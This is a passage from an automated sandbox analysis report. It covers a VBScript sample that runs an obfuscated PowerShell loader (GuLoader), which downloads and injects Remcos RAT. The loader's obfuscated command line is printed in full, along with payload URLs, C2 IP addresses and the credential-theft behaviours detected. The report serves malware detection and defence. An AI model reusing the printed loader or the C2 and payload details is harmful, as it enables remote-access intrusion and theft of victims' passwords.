inssortime theopha&sbefabr&a sgnin tyvendeeta terecafflatuh v,rtumounciale droplettsubvers ';sarcophilus (brassart ' underm$spinulagkredit lkldebrsoreekingbpaeanisahjtelskl endrud: enegaiaddictinov.rvine uickexkrakelee vedf,er orchidtsvinek i tvilliokos,forndecentr=nonincl( skyllec themsemslu,gyhdtwin,le mennesk/henvejrcr,exper pelycos$mikaagrpf.Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal knyttelversenes brilliancies informatica200 bloodroot skrbeligt157 vulcanisable doseringsapparatet superhuman forbytter branddr simplifier commercializing skuffelserne tillukkede121 transseksualismens stamcafym darkey opdagelsesrejses pretenders preemphasize87 scrawliness standardisations smedemestres antibridal';if (${host}.currentculture) {$transplantat++;}function brassart($slingrer){$unbarking=$slingrer.length-$transplantat;$sendetiders='substri';$sendetiders+='ng';for( $catacrotism=7;$catacrotism -lt $unbarking;$catacrotism+=8){$knyttelversenes+=$slingrer.$sendetiders.invoke( $catacrotism, $transplantat);}$knyttelversenes;}function sarcophilus($cerecloth){ & ($grossisten) ($cerecloth);}$deletive=brassart ' unfitlmfer iswomedr.vezleon.teiphotolyl vikin lhemat,rareevoki/saturan5abac.na.japaner0domitiu ,eddykn(servo.ywslvtlysialoewoonho edkld stippeo igmandwrettoryskafk,sk opi,ionnbyrderstcrimina spec.al1awingly0 .ctapo.lilj.rk0ebbinge;camesth afskrmnw gona.eisp.ceryn sundhe6graaspu4vesbite;objekti dobbeltxkammede6aquidne4verserb;pseudom sprogblrscru invandr as:s,eepin1kimblad2leveful1ut ovrd.tintall0 lervar)vinha,d forurengwaggleredravyavc haggadkbantamsodec,nce/fototek2vedlige0 e stra1udram t0scotiat0 doorma1 fluori0mur ero1idrt.kl si detnfdevadr,icetacearhvorefte sond lf .ookbio augmenx elvang/ringvej1thewnes2shikses1porogam.grassch0cleansg ';$capkin=brassart ' ret.imushreddessti hvee.rydelardemoral-unwre.kadramming mik iseirishgrnpopsi,stunaisle ';$skrbeligt157=brassart 'sim,linh paabu.tsugarintboghvedpgeneral: syn,rg/pre.til/lepidob1kl,vare0forudan3uniso,a. ungrea2komp.ns3hum.uri7 sociol.logogra8tetremi6data,le..rammab2antilip4 pissoi7superin/takte.it forsakeopga gsevibratenmaniernt inhesis owshaigradieneunionisr.odalis.bueformla,teriopinspirak mortif ';$conscionableness=brassart 'stateli>stalact ';$grossisten=brassart ' inergiforkodeesemiurnxinosini ';$easters='superhuman';$paleoandesite = brassart ' brudekeblin,tec efterbhpolytypoamar,ll champla%anl sbeasegnefrptidalp.phemocryduncravia spr.gft baromea bick,r% u rmme\waver,namidwif p hnetropspatiumepostnumls andsfmmothbalu dukkeal seed eifamilieg modtaghpithecoe int.rldinkorpo.i.formabtjenestemedi inssortime theopha&sbefabr&a sgnin tyvendeeta terecafflatuh v,rtumounciale droplettsubvers ';sarcophilus (brassart ' underm$spinulagkredit lkldebrsoreekingbpaeanisahjtelskl endrud: enegaiaddictinov.rvine uickexkrakelee vedf,er orchidtsvinek i tvilliokos,forndecentr=nonincl( skyllec themsemslu,gyhdtwin,le mennesk/henvejrcr,exper pelycos$mikaagrpf.Jump to behavior
                Source: wab.exe, 00000011.00000003.1811557960.0000000008B35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: wab.exe, 00000011.00000003.1811557960.0000000008B35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager;g
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24572933 cpuid 17_2_24572933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24572264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,17_2_24572264
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,23_2_004082CD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0041739B GetVersionExW,20_2_0041739B
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword23_2_004033F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword23_2_00402DB3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword23_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6IJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		221
                Scripting                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)212
                Process Injection                		1
                Software Packing                		2
                Credentials in Registry                		2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts212
                Command and Scripting Interpreter                		Login HookLogin Hook1
                DLL Side-Loading                		1
                Credentials In Files                		129
                System Information Discovery                		Distributed Component Object Model11
                Input Capture                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell                		Network Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets141
                Security Software Discovery                		SSH2
                Clipboard Data                		2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Virtualization/Sandbox Evasion                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture112
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync4
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465863 Sample: SOA.vbs Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 42 geoplugin.net 2->42 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Yara detected GuLoader 2->58 60 10 other signatures 2->60 10 wscript.exe 1 2->10         started        signatures3 process4 signatures5 62 VBScript performs obfuscated calls to suspicious functions 10->62 64 Suspicious powershell command line found 10->64 66 Wscript starts Powershell (via cmd or directly) 10->66 68 3 other signatures 10->68 13 powershell.exe 14 19 10->13         started        process6 dnsIp7 48 103.237.86.247, 49700, 49707, 80 BGNR-AP2BainandCompanySG unknown 13->48 76 Suspicious powershell command line found 13->76 78 Obfuscated command line found 13->78 80 Very long command line found 13->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 13->82 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 17->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 17->52 24 wab.exe 3 15 17->24         started        29 cmd.exe 1 17->29         started        process11 dnsIp12 44 103.237.87.32, 1999, 49708, 49709 BGNR-AP2BainandCompanySG unknown 24->44 46 geoplugin.net 178.237.33.50, 49710, 80 ATOM86-ASATOM86NL Netherlands 24->46 40 C:\ProgramData\remcos\logs.dat, data 24->40 dropped 70 Detected Remcos RAT 24->70 72 Maps a DLL or memory area into another process 24->72 74 Installs a global keyboard hook 24->74 31 wab.exe 1 24->31         started        34 wab.exe 1 24->34         started        36 wab.exe 2 24->36         started        38 2 other processes 24->38 file13 signatures14 process15 signatures16 84 Tries to steal Instant Messenger accounts or passwords 31->84 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 34->88

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SOA.vbs0%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://103.237.86.247/T0%Avira URL Cloudsafe
                http://103.237.86.2470%Avira URL Cloudsafe
                http://103.237.86.247/mbLXhRfFSSN77.bin0%Avira URL Cloudsafe
                http://103.237.86.247/Teen0%Avira URL Cloudsafe
                http://103.237.86.247/Teentsi0%Avira URL Cloudsafe
                http://103.237.860%Avira URL Cloudsafe
                http://103.237.86.247/Teentsier.lpkP0%Avira URL Cloudsafe
                http://103.237.86.247/Teentsie0%Avira URL Cloudsafe
                http://103.237.86.247/mbLXhRfFSSN77.binH0%Avira URL Cloudsafe
                http://103.237.86.247/Teentsier0%Avira URL Cloudsafe
                http://103.2370%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                http://103.237.86.247/Teentsier.lp0%Avira URL Cloudsafe
                http://103.237.86.247/Teents0%Avira URL Cloudsafe
                http://103.237.0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpG0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpI0%Avira URL Cloudsafe
                http://103.237.80%Avira URL Cloudsafe
                http://103.20%Avira URL Cloudsafe
                http://geoplugin.net/json.gpL0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpS0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                http://103.237.86.0%Avira URL Cloudsafe
                http://103.237H0%Avira URL Cloudsafe
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                http://103.237.86.247/Teent0%Avira URL Cloudsafe
                http://103.237.86.247/Te0%Avira URL Cloudsafe
                http://www.imvu.com0%Avira URL Cloudsafe
                http://103.237.86.20%Avira URL Cloudsafe
                http://geoplugin.net/json.gpj0%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                http://103.237.86.247/Tee0%Avira URL Cloudsafe
                http://103.237.86.247/0%Avira URL Cloudsafe
                http://103.237.86.247/Teentsier.0%Avira URL Cloudsafe
                http://103.237.86.240%Avira URL Cloudsafe
                103.237.87.320%Avira URL Cloudsafe
                http://103.237.86.247/Teentsier.lpkXR0%Avira URL Cloudsafe
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                http://103.237.86.247/Teentsier.lpk0%Avira URL Cloudsafe
                http://103.230%Avira URL Cloudsafe
                http://103.237.86.247/Teentsier.l0%Avira URL Cloudsafe
                http://www.ebuddy.com0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://103.237.86.247/mbLXhRfFSSN77.binfalse
                  • Avira URL Cloud: safe
                  		unknown
                  103.237.87.32true
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  		unknown
                  http://103.237.86.247/Teentsier.lpkfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://103.237.86.247/Teentsipowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Teentsiepowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Teentsier.lpkPpowershell.exe, 00000002.00000002.1870759337.0000019E8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E8022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E81AD4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://103.237.86powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Teenpowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Teentsierpowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Tpowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/mbLXhRfFSSN77.binHwab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.comwab.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Teentspowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpGwab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpLwab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.1714276170.00000000048D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://103.237.8powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpIwab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Teentsier.lppowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://103.2powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
